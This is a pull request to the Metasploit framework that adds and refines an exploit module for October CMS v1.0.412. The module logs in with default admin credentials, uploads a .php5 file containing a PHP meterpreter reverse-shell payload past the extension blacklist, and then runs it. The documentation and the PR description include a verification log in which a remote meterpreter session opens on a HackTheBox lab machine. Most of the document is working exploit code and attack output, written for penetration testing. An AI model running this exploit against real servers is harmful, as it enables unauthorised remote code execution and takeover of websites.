### PR TITLE
October upload bypass exec

### DIFF
--- a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
+++ b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
@@ -6,7 +6,7 @@ uploading PHP code by checking the file extension. It uses blacklist based
 approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
 Definitions.php:blockedExtensions().
 
-## Vulnerable  Sorftware
+## Vulnerable Software
 https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz
 
 ## Author

--- a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
+++ b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
@@ -2,7 +2,7 @@
 ## Description
 An authenticated user with permission to upload and manage media contents can
 upload various files on the server. The application prevents the user from
-uploading PHP code by checking the file extension. It uses black-list based
+uploading PHP code by checking the file extension. It uses blacklist based
 approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
 Definitions.php:blockedExtensions().
 

--- a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
+++ b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
@@ -1,0 +1,45 @@
+
+## Description
+An authenticated user with permission to upload and manage media contents can
+upload various files on the server. The application prevents the user from
+uploading PHP code by checking the file extension. It uses black-list based
+approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
+Definitions.php:blockedExtensions().
+
+## Vulnerable  Sorftware
+https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz
+
+## Author
+Anti Räis (Discovery)
+Touhid M.Shaikh (Metasploit Module)
+
+## References
+https://www.exploit-db.com/exploits/41936
+
+## Tested on
+HackTheBox October Machine (IP: 10.10.10.16)
+
+## Verification
+msf5 > use exploit/multi/http/october_upload_bypass_exec
+msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16
+rhosts => 10.10.10.16
+msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true
+verbose => true
+msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8
+lhost => 10.10.14.8
+msf5 exploit(multi/http/october_upload_bypass_exec) > run 
+
+[*] Started reverse TCP handler on 10.10.14.8:4444 
+[+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP
+[+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m
+[*] Trying to Login ......
+[+] Authentication successful: admin:admin
+[*] Trying to upload malicious WLMVDKmVpCX.php5 file ....
+[*] Sending stage (38247 bytes) to 10.10.10.16
+[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530
+
+meterpreter > sysinfo 
+Computer    : october
+OS          : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686
+Meterpreter : php/linux
+meterpreter > 

--- a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
+++ b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md
@@ -17,7 +17,7 @@ Touhid M.Shaikh (Metasploit Module)
 https://www.exploit-db.com/exploits/41936
 
 ## Tested on
-HackTheBox October Machine (IP: 10.10.10.16)
+This module was tested on October CMS version v1.0.412 on Ubuntu.
 
 ## Verification
 msf5 > use exploit/multi/http/october_upload_bypass_exec

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cookies = login
 
     #Payload
-    evil = "<?php #{payload.encode} ?>"
+    evil = "<?php #{payload.encoded} ?>"
     payload_name = "#{rand_text_alpha(8 + rand(5))}.php5"
 
     # setup POST request.

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Trying to upload malicious #{payload_name} file ....")
     # Lets Send Upload request.
     res = send_request_cgi({
-      'uri' => normalize_uri(uri, '/backend/cms/media'),
+      'uri' => normalize_uri(uri, 'backend', 'cms', 'media'),
       'method' => 'POST',
       'cookie' => cookies,
       'headers' => {

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.nil?
       fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
-    
+
     # Grabbing Session Key and token from body
     /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -28,7 +28,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'References' =>
         [
-          ['EDB','41936']
+          ['EDB','41936'],
+          ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'],
+          ['CVE','2017-1000119']
         ],
       'DefaultOptions' =>
         {

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # setup POST request.
     post_data = Rex::MIME::Message.new
     post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
-    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")  #payload
+    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")
     data = post_data.to_s
 
     vprint_status("Trying to upload malicious #{payload_name} file ....")

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Send Creds with cookies.
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
+      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
       'cookie' => cookies,
       'vars_post' => Hash[{
         '_session_key' => session,

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def login
     res = send_request_cgi({
       'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
-      'method' => 'GET',
+      'method' => 'GET'
     })
 
     if res.nil?

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -81,7 +81,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
       'method' => 'GET',
     })
-
+    
+    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to request") if res.nil?
+    
     # Grabbing Session Key and token from body
     /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?
@@ -151,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     # Executing Payload Now
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
       'method' => 'GET',
     })

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def login
     res = send_request_cgi({
-      'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
+      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
       'method' => 'GET'
     })
 

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     #Payload
     evil = "<?php #{payload.encoded} ?>"
-    payload_name = "#{rand_text_alpha(8 + rand(5))}.php5"
+    payload_name = "#{rand_text_alpha(8..13)}.php5"
 
     # setup POST request.
     post_data = Rex::MIME::Message.new

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -1,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'October CMS Upload Protection Bypass Code Execution',
+      'Description' => %q{
+          This module exploits an Authenticated user with permission to upload and manage media contents can
+          upload various files on the server. Application prevents the user from
+          uploading PHP code by checking the file extension. It uses black-list based
+          approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
+          Definitions.php:blockedExtensions().
+          This module was tested against October Machine on HachTheBox.
+      },
+      'Author' =>
+        [
+          'Anti Räis', #Discovery
+          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
+          'SecureLayer7.net' # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['EDB','41936']
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL'     => false,
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'ENCODER' => 'php/base64',
+        },
+      'Privileged' => false,
+      'Platform'   => ['php'],
+      'Arch'       => ARCH_PHP,
+      'Targets' =>
+        [
+          [ 'October CMS v1.0.412', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 25 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
+      ])
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(uri, '/modules/system/assets/js/framework.js')
+      })
+    rescue
+      vprint_error('Unable to access the /assets/js/framework.js file')
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200
+      return Exploit::CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
+      'method' => 'GET',
+    })
+
+    # Grabbing Session Key and token from body
+    /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?
+
+    /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?
+    vprint_good("Token for login : #{token}")
+    vprint_good("Session Key for login : #{session}")
+
+    cookies = res.get_cookies
+    vprint_status('Trying to Login ......')
+
+    # Send Creds with cookies.
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
+      'cookie' => cookies,
+      'vars_post' => Hash[{
+        '_session_key' => session,
+        '_token' => token,
+        'postback' => '1',
+        'login' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_a.shuffle],
+    })
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+
+    # if we redirect to core_welcome dan we assume we have authenticated cookie.
+    if res.code == 302
+      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+      return cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+    end
+  end
+
+
+  def exploit
+
+    cookies = login
+
+    #Payload
+    evil = "<?php #{payload.encode} ?>"
+    payload_name = "#{rand_text_alpha(8 + rand(5))}.php5"
+
+    # setup POST request.
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
+    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")  #payload
+    data = post_data.to_s
+
+    vprint_status("Trying to upload malicious #{payload_name} file ....")
+    # Lets Send Upload request.
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, '/backend/cms/media'),
+      'agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
+      'method' => 'POST',
+      'cookie' => cookies,
+      'headers' => {
+        'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager'
+      },
+      'Connection' => 'close',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+    })
+
+    # Executing Payload Now
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, "/storage/app/media/#{payload_name}"),
+      'method' => 'GET',
+    })
+  end
+end

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Executing Payload Now
     send_request_cgi({
       'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
-      'method' => 'GET',
+      'method' => 'GET'
     })
   end
 end

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if res.code == 200
+    if res && res.code == 200
       return Exploit::CheckCode::Appears
     end
 

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
           uploading PHP code by checking the file extension. It uses black-list based
           approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
           Definitions.php:blockedExtensions().
-          This module was tested against October Machine on HachTheBox.
+          This module was tested on October CMS version v1.0.412 on Ubuntu.
       },
       'Author' =>
         [
@@ -81,8 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(uri, '/backend/backend/auth/signin'),
       'method' => 'GET',
     })
-    
-    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to request") if res.nil?
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
     
     # Grabbing Session Key and token from body
     /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
@@ -112,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
 
-    # if we redirect to core_welcome dan we assume we have authenticated cookie.
+    # if we redirect. then we assume we have authenticated cookie.
     if res.code == 302
       print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
       store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
@@ -134,14 +136,13 @@ class MetasploitModule < Msf::Exploit::Remote
     # setup POST request.
     post_data = Rex::MIME::Message.new
     post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
-    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")
+    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")  #payload
     data = post_data.to_s
 
     vprint_status("Trying to upload malicious #{payload_name} file ....")
     # Lets Send Upload request.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, '/backend/cms/media'),
-      'agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
       'method' => 'POST',
       'cookie' => cookies,
       'headers' => {

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       res = send_request_cgi({
         'method' => 'GET',
-        'uri' => normalize_uri(uri, '/modules/system/assets/js/framework.js')
+        'uri' => normalize_uri(uri, 'modules' 'system', 'assets', 'js', 'framework.js')
       })
     rescue
       vprint_error('Unable to access the /assets/js/framework.js file')

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Executing Payload Now
     res = send_request_cgi({
-      'uri' => normalize_uri(uri, "/storage/app/media/#{payload_name}"),
+      'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
       'method' => 'GET',
     })
   end

--- a/modules/exploits/multi/http/october_upload_bypass_exec.rb
+++ b/modules/exploits/multi/http/october_upload_bypass_exec.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author' =>
         [
-          'Anti Räis', #Discovery
+          'Anti Räis', # Discovery
           'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
           'SecureLayer7.net' # Metasploit Module
         ],


### PR DESCRIPTION
## Description
An authenticated user with permission to upload and manage media contents can
upload various files on the server. The application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().

## Vulnerable  Sorftware
https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz

## Author
Anti Räis (Discovery)
Touhid M.Shaikh (Metasploit Module)
SecureLayer7  (Metasploit Module)

## References
https://www.exploit-db.com/exploits/41936

## Tested on
HackTheBox October Machine (IP: 10.10.10.16)

## Verification
msf5 > use exploit/multi/http/october_upload_bypass_exec
msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16
rhosts => 10.10.10.16
msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true
verbose => true
msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(multi/http/october_upload_bypass_exec) > run 

[*] Started reverse TCP handler on 10.10.14.8:4444 
[+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP
[+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m
[*] Trying to Login ......
[+] Authentication successful: admin:admin
[*] Trying to upload malicious WLMVDKmVpCX.php5 file ....
[*] Sending stage (38247 bytes) to 10.10.10.16
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530

meterpreter > sysinfo 
Computer    : october
OS          : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686
Meterpreter : php/linux
meterpreter > 